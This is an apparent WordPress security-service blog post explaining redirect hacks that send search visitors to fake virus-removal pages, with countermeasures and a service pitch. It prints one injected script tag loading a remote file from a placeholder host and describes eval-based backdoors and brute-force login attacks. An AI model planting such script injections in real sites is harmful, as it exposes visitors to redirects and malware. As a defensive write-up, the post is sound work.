Recently, there have been an increasing number of cases where sites have been tampered with, redirecting users to a fake Windows virus removal page or PC repair page only when accessing the site via Google.
In this issue, we will deliver an explanation of this case and countermeasures.

Case Study of Redirect Hack Tampering on a WordPress Site

The following symptoms appear on the site.
When users jump to the site from search results, they are forcibly redirected to a site that is different from the intended page.
In some cases, audio may be played forcibly on sites that urge users to disinfect Windows viruses or restore their PCs.
Symptoms do not always appear, but may appear only the first time or with random probability.

What kind of code is embedded in the site?

A recent trend in redirect hacks is to load a malicious JS file into the site. This JS file is executed when the page is loaded and executes code that redirects the user to another site with random probability.
As an example, the following code is inserted after the link in the post. (The hacker searches for the link string in the post and mechanically sneaks the malicious code afterwards.)

<script src="http://XXXX/jquery.js"></script>

If your site is getting redirected for visits from search results, please check for malicious scripts embedded in that post.

It may also be the case that the site’s theme files header.php and footer.php have been tampered with so that the incorrect JS is loaded on all pages.
Example of header file tampering

The above is an example of malicious code that has been obfuscated (made difficult for people to read) and written into the theme’s header.php, which is loaded on all pages.

How do hackers deface sites?

How do hackers perform such tampering? The most common way is to alter files from the admin screen by taking away administrative privileges. Once they have gained administrator privileges, they can alter files from the admin screen and embed malicious code, called a backdoor, that can easily be used to alter the site in the future.

Example of backdoor code

The above code contains obfuscated POST and GET codes that receive information via a browser, and Evel, which converts the received information into an executable program.

Two main methods are often used to take away administrative privileges.

(1) Exploiting vulnerabilities in WordPress itself or plug-ins to gain administrative privileges.
(2) By running the login operation tens of thousands of times from the login screen using software to retrieve the password and steal administrative privileges.

In the case of (1), security can be improved by keeping WordPress and plug-ins up-to-date. In the case of (2), it can be prevented by using a function called “login lockdown” that prohibits login for several minutes after a certain number of failed login attempts, changing the URL of the login page, and changing the password to one that contains at least 12 one-byte alphanumeric characters and symbols.

Special Cases of Redirect Hacks

There are cases where a site has been invaded by a redirect hack even though WordPress and official plug-ins are used and have not been tampered with. This is an actual case.

Plug-ins distributed on official sites contain tampering code.
Reference article: The case of the suspension of the Display Widgets plugin containing malware and how to deal with it
(We will not reveal the name of the company, but after inquiring with the company, we received a response that they are reviewing their advertisements due to a number of similar cases.)
Computers and smartphones that are viewing the site are infected with a virus.
Reference article Norton: How to eliminate browser hijacker malware

What to do if you have already been hacked

Please note that updating WordPress itself or the plug-ins may not remove the backdoor, other tampered files, or tampered embedding in posts if the site has already been hacked.
Also, once administrator privileges have been taken away, hackers can re-enter through the backdoor.

At WordPress Doctor, we have experience in recovering from hundreds of tampering incidents and have the know-how to take security measures to prevent further tampering.
We will thoroughly remove the tampered files and backdoors from our database of tampered files and install security measures on your site to make it difficult for hackers to hack your site in the future.

Free site tampering code scanning and detection – WordPress Doctor: Malware Scanning Plugin

Related Posts:

  1. WordPress Rarely, a redirect hack that sends the site to another site only from Google search results.
    This section describes a redirect hack that forces WordPress to go to a different rogue site only in rare cases (some patterns say only on smartphones) when jumping from search engine results, and explains how to deal with it....
  2. Redirect hack that takes you to another site when you click on a link on a WordPress site.
    A redirect hack is a type of tampering in which a hacker alters site data or theme files to force users to go to a page that the hacker wants them to go to instead of the page they originally wanted to see. The following is an explanation of a common example of a redirect hack, in which clicking on...
  3. Analysis of WordPress Malware Redirect Hack Techniques
    WordPress Doctor has been recovering sites that have suffered malware tampering, and we would like to explain what kind of redirect hacks (site tampering in which users who access the site are directed to Chinese sites, security sites, etc. without permission) that many sites in particular have been affected by recently. I would like to explain what the code looks...
  4. WordPress site defacement hacking for SEO purposes. what is SEO spam?
    The most common type of WordPress tampering these days is the hacking of WordPress sites for SEO purposes. We will explain this SEO spam....
  5. Example of database tampering with a redirect hack that causes a site to jump to another site
    Redirect hacks that cause a site to jump to another site (often a malicious software download, a fake e-commerce site, or a site that makes you click on a robot authentication) are not only tampering with files, but also getting into the database. Here are some examples of database malware tampering and how to deal with them....
  6. Learn how hackers rewrite (alter) files on your WordPress site to increase security!
    As convenience and site functionality increases with the improved capabilities of programs on servers, not just WordPress, tampering with files on servers has become a major problem. In this article, we will explain how hackers rewrite WordPress files and consider ways to improve security....